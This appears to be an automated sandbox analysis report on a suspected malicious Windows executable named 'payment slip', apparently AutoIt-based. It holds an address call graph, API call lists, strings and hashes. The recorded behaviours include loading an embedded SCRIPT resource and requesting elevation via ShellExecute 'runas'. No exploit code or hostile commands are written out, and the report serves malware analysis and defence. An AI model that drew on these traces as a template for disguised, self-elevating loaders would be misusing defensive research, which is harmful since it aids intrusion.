3a961 22 API calls 99043->99044 99045 3354d 99044->99045 99046 3a6c3 22 API calls 99045->99046 99047 33556 RegOpenKeyExW 99046->99047 99048 73176 RegQueryValueExW 99047->99048 99053 33578 99047->99053 99049 73193 99048->99049 99050 7320c RegCloseKey 99048->99050 99051 4fe0b 22 API calls 99049->99051 99050->99053 99062 7321e _wcslen 99050->99062 99052 731ac 99051->99052 99054 35722 22 API calls 99052->99054 99053->99029 99055 731b7 RegQueryValueExW 99054->99055 99057 731d4 99055->99057 99059 731ee ISource 99055->99059 99056 34c6d 22 API calls 99056->99062 99058 36b57 22 API calls 99057->99058 99058->99059 99059->99050 99060 39cb3 22 API calls 99060->99062 99061 3515f 22 API calls 99061->99062 99062->99053 99062->99056 99062->99060 99062->99061 99063->99031 99065 71f50 __wsopen_s 99064->99065 99066 33364 GetFullPathNameW 99065->99066 99067 33386 99066->99067 99068 36b57 22 API calls 99067->99068 99069 333a4 99068->99069 99069->99040 99070 31098 99075 342de 99070->99075 99074 310a7 99076 3a961 22 API calls 99075->99076 99077 342f5 GetVersionExW 99076->99077 99078 36b57 22 API calls 99077->99078 99079 34342 99078->99079 99080 393b2 22 API calls 99079->99080 99084 34378 99079->99084 99081 3436c 99080->99081 99083 337a0 22 API calls 99081->99083 99082 3441b GetCurrentProcess IsWow64Process 99085 34437 99082->99085 99083->99084 99084->99082 99086 737df 99084->99086 99087 73824 GetSystemInfo 99085->99087 99088 3444f LoadLibraryA 99085->99088 99089 34460 GetProcAddress 99088->99089 99090 3449c GetSystemInfo 99088->99090 99089->99090 99091 34470 GetNativeSystemInfo 99089->99091 99092 34476 99090->99092 99091->99092 99093 3109d 99092->99093 99094 3447a FreeLibrary 99092->99094 99095 500a3 29 API calls __onexit 99093->99095 99094->99093 99095->99074 99096 690fa 99097 69107 99096->99097 99101 6911f 99096->99101 99146 5f2d9 20 API calls __dosmaperr 99097->99146 99099 6910c 99147 627ec 26 API calls _strftime 99099->99147 99102 6917a 99101->99102 99110 69117 99101->99110 99148 6fdc4 21 API calls 2 library calls 99101->99148 99104 5d955 __fread_nolock 26 API calls 99102->99104 99105 69192 99104->99105 99116 68c32 99105->99116 99107 69199 99108 5d955 __fread_nolock 26 API calls 99107->99108 99107->99110 99109 691c5 99108->99109 99109->99110 99111 5d955 __fread_nolock 26 API calls 99109->99111 99112 691d3 99111->99112 99112->99110 99113 5d955 __fread_nolock 26 API calls 99112->99113 99114 691e3 99113->99114 99115 5d955 __fread_nolock 26 API calls 99114->99115 99115->99110 99117 68c3e ___DestructExceptionObject 99116->99117 99118 68c46 99117->99118 99119 68c5e 99117->99119 99150 5f2c6 20 API calls __dosmaperr 99118->99150 99121 68d24 99119->99121 99124 68c97 99119->99124 99157 5f2c6 20 API calls __dosmaperr 99121->99157 99123 68c4b 99151 5f2d9 20 API calls __dosmaperr 99123->99151 99127 68ca6 99124->99127 99128 68cbb 99124->99128 99125 68d29 99158 5f2d9 20 API calls __dosmaperr 99125->99158 99152 5f2c6 20 API calls __dosmaperr 99127->99152 99149 65147 EnterCriticalSection 99128->99149 99132 68cb3 99159 627ec 26 API calls _strftime 99132->99159 99133 68cab 99153 5f2d9 20 API calls __dosmaperr 99133->99153 99134 68cc1 99136 68cf2 99134->99136 99137 68cdd 99134->99137 99141 68d45 __fread_nolock 38 API calls 99136->99141 99154 5f2d9 20 API calls __dosmaperr 99137->99154 99139 68c53 __wsopen_s 99139->99107 99142 68ced 99141->99142 99156 68d1c LeaveCriticalSection __wsopen_s 99142->99156 99143 68ce2 99155 5f2c6 20 API calls __dosmaperr 99143->99155 99146->99099 99147->99110 99148->99102 99149->99134 99150->99123 99151->99139 99152->99133 99153->99132 99154->99143 99155->99142 99156->99139 99157->99125 99158->99132 99159->99139 99160 3f7bf 99161 3f7d3 99160->99161 99162 3fcb6 99160->99162 99164 3fcc2 99161->99164 99165 4fddb 22 API calls 99161->99165 99197 3aceb 23 API calls ISource 99162->99197 99198 3aceb 23 API calls ISource 99164->99198 99167 3f7e5 99165->99167 99167->99164 99168 3fd3d 99167->99168 99169 3f83e 99167->99169 99199 a1155 22 API calls 99168->99199 99171 41310 235 API calls 99169->99171 99185 3ed9d ISource 99169->99185 99189 3ec76 ISource 99171->99189 99172 84beb 99203 a359c 82 API calls __wsopen_s 99172->99203 99174 3fef7 99182 3a8c7 22 API calls 99174->99182 99174->99185 99175 4fddb 22 API calls 99175->99189 99177 84b0b 99201 a359c 82 API calls __wsopen_s 99177->99201 99178 3a8c7 22 API calls 99178->99189 99179 3f3ae ISource 99179->99185 99200 a359c 82 API calls __wsopen_s 99179->99200 99180 84600 99180->99185 99186 3a8c7 22 API calls 99180->99186 99182->99185 99186->99185 99187 50242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 99187->99189 99188 3fbe3 99188->99179 99188->99185 99191 84bdc 99188->99191 99189->99172 99189->99174 99189->99175 99189->99177 99189->99178 99189->99179 99189->99180 99189->99185 99189->99187 99189->99188 99190 3a961 22 API calls 99189->99190 99193 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 99189->99193 99194 500a3 29 API calls pre_c_initialization 99189->99194 99195 401e0 235 API calls 2 library calls 99189->99195 99196 406a0 41 API calls ISource 99189->99196 99190->99189 99202 a359c 82 API calls __wsopen_s 99191->99202 99193->99189 99194->99189 99195->99189 99196->99189 99197->99164 99198->99168 99199->99185 99200->99185 99201->99185 99202->99172 99203->99185 99204 503fb 99205 50407 ___DestructExceptionObject 99204->99205 99233 4feb1 99205->99233 99207 5040e 99208 50561 99207->99208 99211 50438 99207->99211 99260 5083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 99208->99260 99210 50568 99261 54e52 28 API calls _abort 99210->99261 99222 50477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 99211->99222 99244 6247d 99211->99244 99213 5056e 99262 54e04 28 API calls _abort 99213->99262 99217 50576 99218 50457 99220 504d8 99252 50959 99220->99252 99222->99220 99256 54e1a 38 API calls 2 library calls 99222->99256 99224 504de 99225 504f3 99224->99225 99257 50992 GetModuleHandleW 99225->99257 99227 504fa 99227->99210 99228 504fe 99227->99228 99229 50507 99228->99229 99258 54df5 28 API calls _abort 99228->99258 99259 50040 13 API calls 2 library calls 99229->99259 99232 5050f 99232->99218 99234 4feba 99233->99234 99263 50698 IsProcessorFeaturePresent 99234->99263 99236 4fec6 99264 52c94 10 API calls 3 library calls 99236->99264 99238 4fecb 99239 4fecf 99238->99239 99265 62317 99238->99265 99239->99207 99242 4fee6 99242->99207 99246 62494 99244->99246 99245 50a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 99247 50451 99245->99247 99246->99245 99247->99218 99248 62421 99247->99248 99249 62450 99248->99249 99250 50a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 99249->99250 99251 62479 99250->99251 99251->99222 99308 52340 99252->99308 99255 5097f 99255->99224 99256->99220 99257->99227 99258->99229 99259->99232 99260->99210 99261->99213 99262->99217 99263->99236 99264->99238 99269 6d1f6 99265->99269 99268 52cbd 8 API calls 3 library calls 99268->99239 99270 6d213 99269->99270 99271 6d20f 99269->99271 99270->99271 99275 64bfb 99270->99275 99272 50a8c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 99271->99272 99273 4fed8 99272->99273 99273->99242 99273->99268 99276 64c07 ___DestructExceptionObject 99275->99276 99287 62f5e EnterCriticalSection 99276->99287 99278 64c0e 99288 650af 99278->99288 99280 64c1d 99286 64c2c 99280->99286 99301 64a8f 29 API calls 99280->99301 99283 64c27 99302 64b45 GetStdHandle GetFileType 99283->99302 99285 64c3d __wsopen_s 99285->99270 99303 64c48 LeaveCriticalSection _abort 99286->99303 99287->99278 99289 650bb ___DestructExceptionObject 99288->99289 99290 650df 99289->99290 99291 650c8 99289->99291 99304 62f5e EnterCriticalSection 99290->99304 99305 5f2d9 20 API calls __dosmaperr 99291->99305 99294 650cd 99306 627ec 26 API calls _strftime 99294->99306 99296 650d7 __wsopen_s 99296->99280 99297 65117 99307 6513e LeaveCriticalSection _abort 99297->99307 99299 650eb 99299->99297 99300 65000 __wsopen_s 21 API calls 99299->99300 99300->99299 99301->99283 99302->99286 99303->99285 99304->99299 99305->99294 99306->99296 99307->99296 99309 5096c GetStartupInfoW 99308->99309 99309->99255 99310 3dddc 99313 3b710 99310->99313 99314 3b72b 99313->99314 99315 800f8 99314->99315 99316 80146 99314->99316 99340 3b750 99314->99340 99319 80102 99315->99319 99322 8010f 99315->99322 99315->99340 99355 b58a2 235 API calls 2 library calls 99316->99355 99353 b5d33 235 API calls 99319->99353 99333 3ba20 99322->99333 99354 b61d0 235 API calls 2 library calls 99322->99354 99325 803d9 99325->99325 99329 3ba4e 99330 80322 99358 b5c0c 82 API calls 99330->99358 99333->99329 99359 a359c 82 API calls __wsopen_s 99333->99359 99338 3bbe0 40 API calls 99338->99340 99339 4d336 40 API calls 99339->99340 99340->99329 99340->99330 99340->99333 99340->99338 99340->99339 99341 3ec40 235 API calls 99340->99341 99342 3a8c7 22 API calls 99340->99342 99344 3a81b 41 API calls 99340->99344 99345 4d2f0 40 API calls 99340->99345 99346 4a01b 235 API calls 99340->99346 99347 50242 5 API calls __Init_thread_wait 99340->99347 99348 4edcd 22 API calls 99340->99348 99349 500a3 29 API calls __onexit 99340->99349 99350 501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99340->99350 99351 4ee53 82 API calls 99340->99351 99352 4e5ca 235 API calls 99340->99352 99356 3aceb 23 API calls ISource 99340->99356 99357 8f6bf 23 API calls 99340->99357 99341->99340 99342->99340 99344->99340 99345->99340 99346->99340 99347->99340 99348->99340 99349->99340 99350->99340 99351->99340 99352->99340 99353->99322 99354->99333 99355->99340 99356->99340 99357->99340 99358->99333 99359->99325

                                        Executed Functions

                                        Function 000342DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 234 342de-3434d call 3a961 GetVersionExW call 36b57 239 73617-7362a 234->239 240 34353 234->240 241 7362b-7362f 239->241 242 34355-34357 240->242 245 73632-7363e 241->245 246 73631 241->246 243 73656 242->243 244 3435d-343bc call 393b2 call 337a0 242->244 249 7365d-73660 243->249 262 343c2-343c4 244->262 263 737df-737e6 244->263 245->241 248 73640-73642 245->248 246->245 248->242 251 73648-7364f 248->251 252 73666-736a8 249->252 253 3441b-34435 GetCurrentProcess IsWow64Process 249->253 251->239 255 73651 251->255 252->253 256 736ae-736b1 252->256 258 34437 253->258 259 34494-3449a 253->259 255->243 260 736b3-736bd 256->260 261 736db-736e5 256->261 264 3443d-34449 258->264 259->264 265 736bf-736c5 260->265 266 736ca-736d6 260->266 268 736e7-736f3 261->268 269 736f8-73702 261->269 262->249 267 343ca-343dd 262->267 270 73806-73809 263->270 271 737e8 263->271 272 73824-73828 GetSystemInfo 264->272 273 3444f-3445e LoadLibraryA 264->273 265->253 266->253 274 343e3-343e5 267->274 275 73726-7372f 267->275 268->253 277 73715-73721 269->277 278 73704-73710 269->278 279 737f4-737fc 270->279 280 7380b-7381a 270->280 276 737ee 271->276 281 34460-3446e GetProcAddress 273->281 282 3449c-344a6 GetSystemInfo 273->282 285 343eb-343ee 274->285 286 7374d-73762 274->286 287 73731-73737 275->287 288 7373c-73748 275->288 276->279 277->253 278->253 279->270 280->276 289 7381c-73822 280->289 281->282 283 34470-34474 GetNativeSystemInfo 281->283 284 34476-34478 282->284 283->284 290 34481-34493 284->290 291 3447a-3447b FreeLibrary 284->291 292 73791-73794 285->292 293 343f4-3440f 285->293 294 73764-7376a 286->294 295 7376f-7377b 286->295 287->253 288->253 289->279 291->290 292->253 296 7379a-737c1 292->296 297 34415 293->297 298 73780-7378c 293->298 294->253 295->253 299 737c3-737c9 296->299 300 737ce-737da 296->300 297->253 298->253 299->253 300->253
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 0003430D
                                          • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                        • GetCurrentProcess.KERNEL32(?,000CCB64,00000000,?,?), ref: 00034422
                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 00034429
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00034454
                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00034466
                                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00034474
                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0003447B
                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 000344A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                        • API String ID: 3290436268-3101561225
                                        • Opcode ID: 71f730adca2e91ac06fb98ea5d6559dce0737208af968560d234898b079c5058
                                        • Instruction ID: 562c7bc3c51465ea5e242cbcf6fe9f8274ff7d4cb6b846dae06d5a91df09f111
                                        • Opcode Fuzzy Hash: 71f730adca2e91ac06fb98ea5d6559dce0737208af968560d234898b079c5058
                                        • Instruction Fuzzy Hash: 3FA1E962D0A2C4FFD726C76A7C815997FD87B26320F0884A8D0C59FE22D2BC45C4DB25
                                        Function 000342A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 661 342a2-342ba CreateStreamOnHGlobal 662 342da-342dd 661->662 663 342bc-342d3 FindResourceExW 661->663 664 342d9 663->664 665 735ba-735c9 LoadResource 663->665 664->662 665->664 666 735cf-735dd SizeofResource 665->666 666->664 667 735e3-735ee LockResource 666->667 667->664 668 735f4-735fc 667->668 669 73600-73612 668->669 669->664
                                        APIs
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000350AA,?,?,00000000,00000000), ref: 000342B2
                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000350AA,?,?,00000000,00000000), ref: 000342C9
                                        • LoadResource.KERNEL32(?,00000000,?,?,000350AA,?,?,00000000,00000000,?,?,?,?,?,?,00034F20), ref: 000735BE
                                        • SizeofResource.KERNEL32(?,00000000,?,?,000350AA,?,?,00000000,00000000,?,?,?,?,?,?,00034F20), ref: 000735D3
                                        • LockResource.KERNEL32(000350AA,?,?,000350AA,?,?,00000000,00000000,?,?,?,?,?,?,00034F20,?), ref: 000735E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                        • String ID: SCRIPT
                                        • API String ID: 3051347437-3967369404
                                        • Opcode ID: e65843b05452c098fc53c410784f14bfb01bbd2de4cd2ce20edb241d8ac4a254
                                        • Instruction ID: 625e3f2b414380327432585323face6991277067d6ea4099553cec483d9908a7
                                        • Opcode Fuzzy Hash: e65843b05452c098fc53c410784f14bfb01bbd2de4cd2ce20edb241d8ac4a254
                                        • Instruction Fuzzy Hash: 91117C70600700BFF7228BA6DC48F277BBDEBC6B51F148169F4169A660DB75EC008A20
                                        Function 00072BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1469 72ba5-72ba9 1470 32b25-32b3b call 32b83 call 32c63 1469->1470 1471 72baf-72bcc call 33a5a call 39cb3 1469->1471 1480 32b44-32b4a call 3d760 1470->1480 1481 32b3d-32b3f call 33837 1470->1481 1482 72bf5-72bfd call 333c6 1471->1482 1483 72bce-72bf3 call 333c6 call 36350 call 333c6 1471->1483 1489 32b4f-32b56 1480->1489 1481->1480 1494 72bfe-72c26 GetForegroundWindow ShellExecuteW call 3988f 1482->1494 1483->1494 1492 32b58-32b5a call 330f2 1489->1492 1493 32b5f-32b80 call 33d1b SetCurrentDirectoryW call 3988f 1489->1493 1492->1493 1494->1493
                                        APIs
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00032B6B
                                          • Part of subcall function 00033A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00101418,?,00032E7F,?,?,?,00000000), ref: 00033A78
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                        • GetForegroundWindow.USER32(runas,?,?,?,?,?,000F2224), ref: 00072C10
                                        • ShellExecuteW.SHELL32(00000000,?,?,000F2224), ref: 00072C17
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                        • String ID: runas
                                        • API String ID: 448630720-4000483414
                                        • Opcode ID: e5363319f776892ac779de7997ffa0b32c105a7867d01484b3300c9087fdc557
                                        • Instruction ID: b3612dd68635b20a09b0c30cb29662cfe6234770ce8e18ef3c68b44ee27ee3ab
                                        • Opcode Fuzzy Hash: e5363319f776892ac779de7997ffa0b32c105a7867d01484b3300c9087fdc557
                                        • Instruction Fuzzy Hash: 4011D331608345AAD71AFF60DC92DFEB7AC9B91300F44542DF286520A3CFA58A49D712
                                        Function 0009DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(?,00075222), ref: 0009DBCE
                                        • GetFileAttributesW.KERNELBASE(?), ref: 0009DBDD
                                        • FindFirstFileW.KERNELBASE(?,?), ref: 0009DBEE
                                        • FindClose.KERNEL32(00000000), ref: 0009DBFA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                        • String ID:
                                        • API String ID: 2695905019-0
                                        • Opcode ID: 114ba7fc76cd965225c080397f1fc20ec15fbef13cfcd3cf89b46b188d45b14d
                                        • Instruction ID: e4ffe73aef33fab172df3e90f9c5bc0ea6c221d3859b5199aa57823ddc31fc77
                                        • Opcode Fuzzy Hash: 114ba7fc76cd965225c080397f1fc20ec15fbef13cfcd3cf89b46b188d45b14d
                                        • Instruction Fuzzy Hash: 6CF0A0B085091197AA206B78EC0DCAA77AC9F02334B144703F83AC20E0EBB45D559695
                                        Function 0003D730 Relevance: 21.6, APIs: 14, Instructions: 631windowsleeptimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetInputState.USER32 ref: 0003D807
                                        • timeGetTime.WINMM ref: 0003DA07
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0003DB28
                                        • TranslateMessage.USER32(?), ref: 0003DB7B
                                        • DispatchMessageW.USER32(?), ref: 0003DB89
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0003DB9F
                                        • Sleep.KERNEL32(0000000A), ref: 0003DBB1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                        • String ID:
                                        • API String ID: 2189390790-0
                                        • Opcode ID: a7f9ebf430a288e4e2e01712d502da53cbdef3b28fddbc31905bb8fd54108397
                                        • Instruction ID: a6669a72be199b162cb4cd41d4cbafad4c8465486da3ff5d9a48b93596a99999
                                        • Opcode Fuzzy Hash: a7f9ebf430a288e4e2e01712d502da53cbdef3b28fddbc31905bb8fd54108397
                                        • Instruction Fuzzy Hash: 34421370608341EFE73ADF24D884FAAB7E9FF46300F14455AE49687292D774E884CB82
                                        Function 0003344D Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 201registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00033A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00101418,?,00032E7F,?,?,?,00000000), ref: 00033A78
                                          • Part of subcall function 00033357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00033379
                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0003356A
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0007318D
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 000731CE
                                        • RegCloseKey.ADVAPI32(?), ref: 00073210
                                        • _wcslen.LIBCMT ref: 00073277
                                        • _wcslen.LIBCMT ref: 00073286
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                        • String ID: Include$Software\AutoIt v3\AutoIt$T;$\$\Include\$xR
                                        • API String ID: 98802146-3832990523
                                        • Opcode ID: 9c3dc98e29042c72e36aaafd06537b94f683627fd579a50bdb33940a2bb9717e
                                        • Instruction ID: ce9a0307795971130691f30337513ce75d2081fc503c0219f6739acdb91eba59
                                        • Opcode Fuzzy Hash: 9c3dc98e29042c72e36aaafd06537b94f683627fd579a50bdb33940a2bb9717e
                                        • Instruction Fuzzy Hash: 4071D4715043019ED305EF65DC85DAFB7E8FF89340F40482EF5899B1A2EBB49A88CB52
                                        Function 00032CD4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53windowregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00032D07
                                        • RegisterClassExW.USER32(00000030), ref: 00032D31
                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00032D42
                                        • InitCommonControlsEx.COMCTL32(?), ref: 00032D5F
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00032D6F
                                        • LoadIconW.USER32(000000A9), ref: 00032D85
                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00032D94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated$U
                                        • API String ID: 2914291525-3335495158
                                        • Opcode ID: 0df3783e2a1b2293c22f4158df71090d130e662a22a76c63718acfcbd84053c1
                                        • Instruction ID: 4bf72cf3bf39901996169f965aa2a792f9927ed7d1f95d6b22e89c4d6d0f5753
                                        • Opcode Fuzzy Hash: 0df3783e2a1b2293c22f4158df71090d130e662a22a76c63718acfcbd84053c1
                                        • Instruction Fuzzy Hash: 6C21EFB1D01308AFEB00DFA4E889F9DBBB4FB08704F10811AF655AA6A0D7B90580CF91
                                        Function 0007065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 372 7065b-7068b call 7042f 375 706a6-706b2 call 65221 372->375 376 7068d-70698 call 5f2c6 372->376 381 706b4-706c9 call 5f2c6 call 5f2d9 375->381 382 706cb-70714 call 7039a 375->382 383 7069a-706a1 call 5f2d9 376->383 381->383 391 70716-7071f 382->391 392 70781-7078a GetFileType 382->392 393 7097d-70983 383->393 397 70756-7077c GetLastError call 5f2a3 391->397 398 70721-70725 391->398 394 707d3-707d6 392->394 395 7078c-707bd GetLastError call 5f2a3 CloseHandle 392->395 400 707df-707e5 394->400 401 707d8-707dd 394->401 395->383 409 707c3-707ce call 5f2d9 395->409 397->383 398->397 402 70727-70754 call 7039a 398->402 406 707e9-70837 call 6516a 400->406 407 707e7 400->407 401->406 402->392 402->397 415 70847-7086b call 7014d 406->415 416 70839-70845 call 705ab 406->416 407->406 409->383 422 7087e-708c1 415->422 423 7086d 415->423 416->415 421 7086f-70879 call 686ae 416->421 421->393 425 708c3-708c7 422->425 426 708e2-708f0 422->426 423->421 425->426 428 708c9-708dd 425->428 429 708f6-708fa 426->429 430 7097b 426->430 428->426 429->430 431 708fc-7092f CloseHandle call 7039a 429->431 430->393 434 70963-70977 431->434 435 70931-7095d GetLastError call 5f2a3 call 65333 431->435 434->430 435->434
                                        APIs
                                          • Part of subcall function 0007039A: CreateFileW.KERNELBASE(00000000,00000000,?,00070704,?,?,00000000,?,00070704,00000000,0000000C), ref: 000703B7
